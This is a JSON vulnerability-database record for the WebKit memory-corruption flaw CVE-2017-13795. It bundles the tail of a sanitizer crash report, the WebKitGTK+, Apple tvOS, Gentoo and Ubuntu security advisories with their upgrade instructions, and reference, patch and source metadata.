fd\n 0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa\n 0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa\n 0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd\n 0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==30369==ABORTING\n\n\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\nor a patch has been made broadly available, the bug report will become\nvisible to the public. \n\n\n\n\nFound by: ifratric\n\n. ------------------------------------------------------------------------\nWebKitGTK+ Security Advisory WSA-2017-0009\n------------------------------------------------------------------------\n\nDate reported : November 10, 2017\nAdvisory ID : WSA-2017-0009\nAdvisory URL : https://webkitgtk.org/security/WSA-2017-0009.html\nCVE identifiers : CVE-2017-13783, CVE-2017-13784, CVE-2017-13785,\n CVE-2017-13788, CVE-2017-13791, CVE-2017-13792,\n CVE-2017-13793, CVE-2017-13794, CVE-2017-13795,\n CVE-2017-13796, CVE-2017-13798, CVE-2017-13802,\n CVE-2017-13803. \n\nSeveral vulnerabilities were discovered in WebKitGTK+. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to xisigr of Tencent\u0027s Xuanwu Lab (tencent.com). Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Hanul Choi working with Trend Micro\u0027s Zero Day Initiative. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n Credit to chenqin (ee|) of Ant-financial Light-Year Security. Description: Multiple memory corruption\n issues were addressed with improved memory handling. \n\n\nWe recommend updating to the last stable version of WebKitGTK+. It is\nthe best way of ensuring that you are running a safe version of\nWebKitGTK+. Please check our website for information about the last\nstable releases. \n\nFurther information about WebKitGTK+ Security Advisories can be found\nat: https://webkitgtk.org/security.html\n\nThe WebKitGTK+ team,\nNovember 10, 2017\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\nAPPLE-SA-2017-10-31-3 tvOS 11.1\n\ntvOS 11.1 is now available and addresses the following:\n\nCoreText\nAvailable for: Apple TV 4K and Apple TV (4th generation)\nImpact: Processing a maliciously crafted text file may lead to an\nunexpected application termination\nDescription: A denial of service issue was addressed through improved\nmemory handling. \nCVE-2017-13849: Ro of SavSec\n\nKernel\nAvailable for: Apple TV 4K and Apple TV (4th generation)\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2017-13799: an anonymous researcher\n\nStreamingZip\nAvailable for: Apple TV 4K and Apple TV (4th generation)\nImpact: A malicious zip file may be able modify restricted areas of\nthe file system\nDescription: A path handling issue was addressed with improved\nvalidation. \nCVE-2017-13804: @qwertyoruiopz at KJC Research Intl. S.R.L. This was addressed with improved state management. \nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU\nLeuven\n\nInstallation note:\n\nApple TV will periodically check for software updates. Alternatively,\nyou may manually check for software updates by selecting\n\"Settings -\u003e System -\u003e Software Update -\u003e Update Software.\"\n\nTo check the current version of software, select\n\"Settings -\u003e General -\u003e About.\"\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAln4u78pHHByb2R1Y3Qt\nc2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEYANRAA\nmwauLif6cLmTRZf4ENKJUA1oMP5xVnua/W8eG3Pb5/7InUls4m3chSI0uCzcGD4w\nZ4wVG/2ONKfHU/xjAB/IJcnBphQUsJyKyYp+mMDJHt5HJPW1gpyzdKoSmy3plFPM\nPghs6v5DaG1vF9s+zqNrnBQwX0Juqwo87CBcDfg5862p5gxWocpSsLGZ0DZ9sErn\neMkD/jTG9H4XYsI7T34DvDzCdFsFWGPPN6nWb9Vb0tcW4D/1WSaxJKJApXdJU6yz\nFj6W7CnFOkw7SSA1qb2xl7FyVN4mzxRTRF0f8IsCQfzI7kLpNJ6rIFX0kca8FVYM\nORzOLigK4eUuEeuCRV32yZuvxDF/2st3TzmFs0XKnzzd9MTIsqZogh/cv7v3MCUd\nFBhfEiANx86AO6OZ5VtTzqLbchm3Dws15s6G94Cmj/epuGgHYpnKnJewlpX/pVW+\nQSJ+QY/q9ucjd9pnDbcutt8gfY0NCLlyjix5i0I/zAm1LhqGJJAmh1nAziiIPfzl\nBwI+awHCJMn9MTI56vrNsyfMIdd2X7Cux5OxEmr0sMkjAYdf3HVXA8fMb7tzukRT\nbr+WwVWAskuJCC2PiYHcGz1x7GTzZBWXPJ6/U1K+PsUSfN/nQKdh2U3L7ivVfRWi\nsB8o+ec+qJeAoT41wLeCb67PgvFF//Gul8g5eh68wCI=\n=255g\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201712-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: WebKitGTK+: Multiple vulnerabilities\n Date: December 14, 2017\n Bugs: #637076\n ID: 201712-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been discovered in WebKitGTK+, the worst\nof which may lead to arbitrary code execution. \n\nBackground\n==========\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine,\nsuitable for projects requiring any kind of web integration, from\nhybrid HTML/CSS applications to full-fledged web browsers. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-libs/webkit-gtk \u003c 2.18.3 \u003e= 2.18.3\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please\nreview the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere are no known workarounds at this time. \n\nResolution\n==========\n\nAll WebKitGTK+ users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-libs/webkit-gtk-2.18.3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2017-13783\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13783\n[ 2 ] CVE-2017-13784\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13784\n[ 3 ] CVE-2017-13785\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13785\n[ 4 ] CVE-2017-13788\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13788\n[ 5 ] CVE-2017-13791\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13791\n[ 6 ] CVE-2017-13792\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13792\n[ 7 ] CVE-2017-13793\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13793\n[ 8 ] CVE-2017-13794\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13794\n[ 9 ] CVE-2017-13795\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13795\n[ 10 ] CVE-2017-13796\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13796\n[ 11 ] CVE-2017-13798\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13798\n[ 12 ] CVE-2017-13802\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13802\n[ 13 ] CVE-2017-13803\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13803\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201712-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. \n===========================================================================\nUbuntu Security Notice USN-3481-1\nNovember 16, 2017\n\nwebkit2gtk vulnerabilities\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 17.10\n- Ubuntu 17.04\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in WebKitGTK+. \n\nSoftware Description:\n- webkit2gtk: Web content engine library for GTK+\n\nDetails:\n\nA large number of security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 17.10:\n libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.17.10.1\n libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.17.10.1\n\nUbuntu 17.04:\n libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.17.04.1\n libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.17.04.1\n\nUbuntu 16.04 LTS:\n libjavascriptcoregtk-4.0-18 2.18.3-0ubuntu0.16.04.1\n libwebkit2gtk-4.0-37 2.18.3-0ubuntu0.16.04.1\n\nThis update uses a new upstream release, which includes additional bug\nfixes. After a standard system update you need to restart any applications\nthat use WebKitGTK+, such as Epiphany, to make all the necessary changes. \n\nReferences:\n https://www.ubuntu.com/usn/usn-3481-1\n CVE-2017-13783, CVE-2017-13784, CVE-2017-13785, CVE-2017-13788,\n CVE-2017-13791, CVE-2017-13792, CVE-2017-13793, CVE-2017-13794,\n CVE-2017-13795, CVE-2017-13796, CVE-2017-13798, CVE-2017-13802,\n CVE-2017-13803\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.10.1\n https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.04.1\n https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.16.04.1\n\n\n\n--cAJSiv6PLl8jlntXfAr5kK8XnnPQvgKnJ--\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-13795"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"db": "PACKETSTORM",
"id": "145087"
},
{
"db": "PACKETSTORM",
"id": "144947"
},
{
"db": "PACKETSTORM",
"id": "144861"
},
{
"db": "PACKETSTORM",
"id": "144828"
},
{
"db": "PACKETSTORM",
"id": "145415"
},
{
"db": "PACKETSTORM",
"id": "144830"
},
{
"db": "PACKETSTORM",
"id": "144831"
},
{
"db": "PACKETSTORM",
"id": "145014"
}
],
"trust": 2.52
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-104453",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43169",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "VULMON",
"id": "CVE-2017-13795"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-13795",
"trust": 3.4
},
{
"db": "SECTRACK",
"id": "1039703",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "43169",
"trust": 1.8
},
{
"db": "JVN",
"id": "JVNVU99000953",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "145087",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-96886",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-104453",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-13795",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144947",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144861",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144828",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "145415",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144830",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144831",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "145014",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"db": "PACKETSTORM",
"id": "145087"
},
{
"db": "PACKETSTORM",
"id": "144947"
},
{
"db": "PACKETSTORM",
"id": "144861"
},
{
"db": "PACKETSTORM",
"id": "144828"
},
{
"db": "PACKETSTORM",
"id": "145415"
},
{
"db": "PACKETSTORM",
"id": "144830"
},
{
"db": "PACKETSTORM",
"id": "144831"
},
{
"db": "PACKETSTORM",
"id": "145014"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"id": "VAR-201711-0447",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-104453"
}
],
"trust": 0.01
},
"last_update_date": "2025-12-22T20:55:52.317000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Apple security updates",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT201222"
},
{
"title": "HT208223",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT208223"
},
{
"title": "HT208224",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT208224"
},
{
"title": "HT208225",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT208225"
},
{
"title": "HT208219",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT208219"
},
{
"title": "HT208222",
"trust": 0.8,
"url": "https://support.apple.com/en-us/HT208222"
},
{
"title": "HT208219",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT208219"
},
{
"title": "HT208222",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT208222"
},
{
"title": "HT208223",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT208223"
},
{
"title": "HT208224",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT208224"
},
{
"title": "HT208225",
"trust": 0.8,
"url": "https://support.apple.com/ja-jp/HT208225"
},
{
"title": "Multiple Apple product WebKit Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=90662"
},
{
"title": "Ubuntu Security Notice: webkit2gtk vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-3481-1"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/marckwei/temp "
},
{
"title": "domato",
"trust": 0.1,
"url": "https://github.com/googleprojectzero/domato "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/43169/"
},
{
"trust": 1.9,
"url": "https://security.gentoo.org/glsa/201712-01"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht208219"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht208222"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht208223"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht208224"
},
{
"trust": 1.8,
"url": "https://support.apple.com/ht208225"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1039703"
},
{
"trust": 1.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13795"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-13795"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu99000953/index.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13785"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13798"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13802"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13784"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13796"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13791"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13803"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13792"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13794"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13793"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13783"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13788"
},
{
"trust": 0.4,
"url": "https://support.apple.com/kb/ht201222"
},
{
"trust": 0.4,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/3481-1/"
},
{
"trust": 0.1,
"url": "https://webkitgtk.org/security/wsa-2017-0009.html"
},
{
"trust": 0.1,
"url": "https://webkitgtk.org/security.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13789"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13790"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13804"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-13080"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13788"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13795"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13796"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13803"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13798"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13791"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13794"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13785"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13792"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13793"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13783"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13784"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2017-13802"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://www.apple.com/itunes/download/"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht204283"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.17.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/webkit2gtk/2.18.3-0ubuntu0.16.04.1"
},
{
"trust": 0.1,
"url": "https://www.ubuntu.com/usn/usn-3481-1"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"db": "PACKETSTORM",
"id": "145087"
},
{
"db": "PACKETSTORM",
"id": "144947"
},
{
"db": "PACKETSTORM",
"id": "144861"
},
{
"db": "PACKETSTORM",
"id": "144828"
},
{
"db": "PACKETSTORM",
"id": "145415"
},
{
"db": "PACKETSTORM",
"id": "144830"
},
{
"db": "PACKETSTORM",
"id": "144831"
},
{
"db": "PACKETSTORM",
"id": "145014"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"db": "PACKETSTORM",
"id": "145087"
},
{
"db": "PACKETSTORM",
"id": "144947"
},
{
"db": "PACKETSTORM",
"id": "144861"
},
{
"db": "PACKETSTORM",
"id": "144828"
},
{
"db": "PACKETSTORM",
"id": "145415"
},
{
"db": "PACKETSTORM",
"id": "144830"
},
{
"db": "PACKETSTORM",
"id": "144831"
},
{
"db": "PACKETSTORM",
"id": "145014"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-13T00:00:00",
"db": "VULHUB",
"id": "VHN-104453"
},
{
"date": "2017-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"date": "2017-11-22T15:50:02",
"db": "PACKETSTORM",
"id": "145087"
},
{
"date": "2017-11-10T20:22:22",
"db": "PACKETSTORM",
"id": "144947"
},
{
"date": "2017-11-02T23:34:42",
"db": "PACKETSTORM",
"id": "144861"
},
{
"date": "2017-11-01T15:44:40",
"db": "PACKETSTORM",
"id": "144828"
},
{
"date": "2017-12-14T22:34:00",
"db": "PACKETSTORM",
"id": "145415"
},
{
"date": "2017-11-01T15:48:24",
"db": "PACKETSTORM",
"id": "144830"
},
{
"date": "2017-11-01T15:50:11",
"db": "PACKETSTORM",
"id": "144831"
},
{
"date": "2017-11-17T00:10:06",
"db": "PACKETSTORM",
"id": "145014"
},
{
"date": "2017-08-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"date": "2017-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"date": "2017-11-13T03:29:00.707000",
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-22T00:00:00",
"db": "VULHUB",
"id": "VHN-104453"
},
{
"date": "2019-03-22T00:00:00",
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"date": "2019-03-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"date": "2017-12-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "145014"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Apple Used in products WebKit Vulnerability in arbitrary code execution in components",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…